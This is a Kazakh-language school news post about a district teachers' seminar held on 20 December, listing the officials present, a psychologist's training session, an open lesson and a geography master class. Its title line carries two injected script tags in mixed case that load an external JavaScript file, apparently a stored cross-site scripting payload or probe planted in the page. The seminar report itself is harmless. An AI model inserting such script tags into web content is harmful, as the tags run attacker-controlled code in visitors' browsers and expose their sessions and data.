Жаңартылған білім беруде оқытудың ерекшеліктері<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
23.12.2019
Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 20 желтоқсан күні «Жаңартылған білім беруде оқытудың ерекшеліктері» және «Әр түрлі платформаларды сандық ресурстарын жасау» тақырыптарында бизнес және кәсіпкерлік негіздері, география, информатика пәндер мұғалімдерінің аудандық семинар өтті. Семинардың ашылуына аудандық білім беру бөлімінің бас маманы Тохашева М.С мен әдіскер Даниярова К.Е қатысты.
Біздің мектептен семинарға төрт мұғалім қатысып өз тәжірибелерімен бөлісті. Мектеп психологі Тапаева А.Қ «Көңіл күйді жақсарт» тренинг өткізді. Сонымен қатар кәсіпкерлік және бизнес пәнінің мұғалімі Турлыбекова Т.К 10 сыныпта «Кәсіпкерліктегі инновациялар мен трендтер» ашық сабақ, география пәнінің мұғалімі Есенгулова Т.С «Критериалдық бағалау география сабағында» шеберлік сағатын өткізді. Семинар соңында қатысушы мұғалімдер кері байланыс жасай отырып, өз ой пікірлерін білдіріп ұсынымдар мен қорытынды қабылдау шешімдерін шығарды. Семинар жоғары дәрежеде өткізіліп, өз мақсатына жетті.
Сулеймен Е.